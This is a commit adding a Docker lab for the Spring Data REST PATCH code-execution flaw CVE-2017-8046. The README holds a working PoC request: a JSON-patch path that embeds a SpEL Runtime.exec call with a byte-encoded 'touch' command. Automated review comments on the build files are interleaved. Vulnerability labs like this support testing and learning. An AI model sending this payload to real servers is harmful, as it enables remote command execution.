(Add Vul: Spring) Spring Data REST PATCH request code execution vulnerability (CVE-2017-8046)

This commit is contained in:
Medicean 2017-09-29 03:18:17 +08:00
parent 7e2ec8bb13
commit 21b9b4e30d
10 changed files with 93 additions and 0 deletions


@ -114,6 +114,7 @@ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
* [Samba](./s/samba/)
* [Shiro](./s/shiro/)
* [SSH](./s/ssh/)
* [Spring](./s/spring/)
* [Spring Boot](./s/springboot/)
* [Struts2](./s/struts2/)
* [Spring WebFlow](./s/springwebflow/)


@ -3,6 +3,7 @@
* [Samba](./samba/)
* [Shiro](./shiro/)
* [SSH](./ssh/)
* [Spring](./spring/)
* [Spring Boot](./springboot/)
* [Struts2](./struts2/)
* [Spring WebFlow](./springwebflow/)

s/spring/1/Dockerfile Normal file

@ -0,0 +1,15 @@
FROM openjdk:8-jdk
MAINTAINER Medici.Yan@Gmail.com
ENV JAR_URL http://vulapps.poetn.cc/s/spring/spring-data-rest/spring-data-rest-cve-2017-8046.jar
COPY src/start.sh /start.sh
RUN set -x \
&& chmod a+x /start.sh \
&& mkdir /htdocs \
&& wget -qO /htdocs/ROOT.jar $JAR_URL
EXPOSE 8080
CMD ["/start.sh"]
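Review bot: the build fetches the vulnerable application jar over plain HTTP (`ENV JAR_URL http://vulapps.poetn.cc/...`) and writes it straight to `/htdocs/ROOT.jar` with no integrity check, so whatever that host serves at build time becomes the image. Pin the expected digest next to the URL and fail the build on mismatch, for example `ENV JAR_SHA256 <sha256-of-jar>` (placeholder) followed by `echo "$JAR_SHA256  /htdocs/ROOT.jar" | sha256sum -c -` after the `wget`, and serve the file over HTTPS if the host supports it. Minor: `MAINTAINER` is deprecated in favour of `LABEL maintainer="..."`.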

s/spring/1/README.md Normal file

@ -0,0 +1,68 @@
## Spring Data REST PATCH请求代码执行漏洞(CVE-2017-8046)
### 漏洞信息
* [CVE-2017-8046: RCE in PATCH requests in Spring Data REST](https://pivotal.io/security/cve-2017-8046)
* [这个Spring高危漏洞你修补了吗-- 其河@美团点评技术团队](https://mp.weixin.qq.com/s/uTiWDsPKEjTkN6z9QNLtSA)
### 获取环境:
1. 拉取镜像到本地
```
$ docker pull medicean/vulapps:s_spring_1
```
2. 启动环境
```
$ docker run -d -p 8080:8080 medicean/vulapps:s_spring_1
```
> `-p 8080:8080` 前面的 8080 代表物理机的端口,可随意指定。
### 使用与利用
访问 `http://你的 IP 地址:端口号/`, 假设启动的端口号为 8080
#### PoC
1. 访问 `http://127.0.0.1:8080/`,测试服务是否启动成功
> 第一次启动时会下载 mongodb网速慢的可能要多等一会儿
![](https://github.com/Medicean/VulApps/raw/master/s/spring/1/poc-1.png)
2. 利用 POST 请求添加一个数据
```
POST /persons HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/json
Cache-Control: no-cache
{"firstName": "VulApps", "lastName": "VulApps"}
```
![](https://github.com/Medicean/VulApps/raw/master/s/spring/1/poc-2.png)
3. 执行 PoC
执行命令为: `/usr/bin/touch /tmp/vuln`,注意 Content-Type 值为 `application/json-patch+json`
```
PATCH /persons/1 HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/json-patch+json
Cache-Control: no-cache
Content-Length: 228
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,47,116,109,112,47,118,117,108,110}))/lastName", "value": "vulapps-demo" }]
```
![](https://github.com/Medicean/VulApps/raw/master/s/spring/1/poc-3.png)
4. 进入容器,发现成功创建文件
![](https://github.com/Medicean/VulApps/raw/master/s/spring/1/poc-4.png)
### 参考链接
* [这个Spring高危漏洞你修补了吗-- 其河@美团点评技术团队](https://mp.weixin.qq.com/s/uTiWDsPKEjTkN6z9QNLtSA)
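Review bot: the README gives the PoC but states no affected or fixed versions and no remediation, so a reader cannot tell which Spring Data REST release the image runs or what closes the issue; add a line under 漏洞信息 with the affected and fixed versions as given in the linked Pivotal advisory, plus the version of the jar baked into the image. Formatting: the fenced blocks carry no language tag (```shell for the docker commands, ```http for the requests), the 获取环境 heading ends in a colon unlike the other headings, and 参考链接 repeats the 美团 link already listed under 漏洞信息.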

s/spring/1/poc-1.png Normal file

s/spring/1/poc-2.png Normal file

s/spring/1/poc-3.png Normal file

s/spring/1/poc-4.png Normal file

s/spring/1/src/start.sh Normal file

@ -0,0 +1,5 @@
#!/bin/bash
while [[ true ]]; do
java -jar /htdocs/ROOT.jar
sleep 5
done
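Review bot: `while [[ true ]]` only loops because `[[ true ]]` tests that a non-empty string is present; the idiomatic form is `while true; do`. More importantly, since this script is the container's `CMD`, bash runs as PID 1 and the `java` child never receives the SIGTERM from `docker stop`, so every stop waits out the kill timeout, and the loop turns a crashing jar into a silent 5-second restart cycle. If the restart loop is intended, add a `trap` that forwards the signal to the java child; otherwise replace the loop with `exec java -jar /htdocs/ROOT.jar` so java is PID 1 and a failure shows up in the container exit status.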

s/spring/README.md Normal file

@ -0,0 +1,3 @@
# Spring
* [Spring Data REST PATCH请求代码执行漏洞(CVE-2017-8046)](./1/)